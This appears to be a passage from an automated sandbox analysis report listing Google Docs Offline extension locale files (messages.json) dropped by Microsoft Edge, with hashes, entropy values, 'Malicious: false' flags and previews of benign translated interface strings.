Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
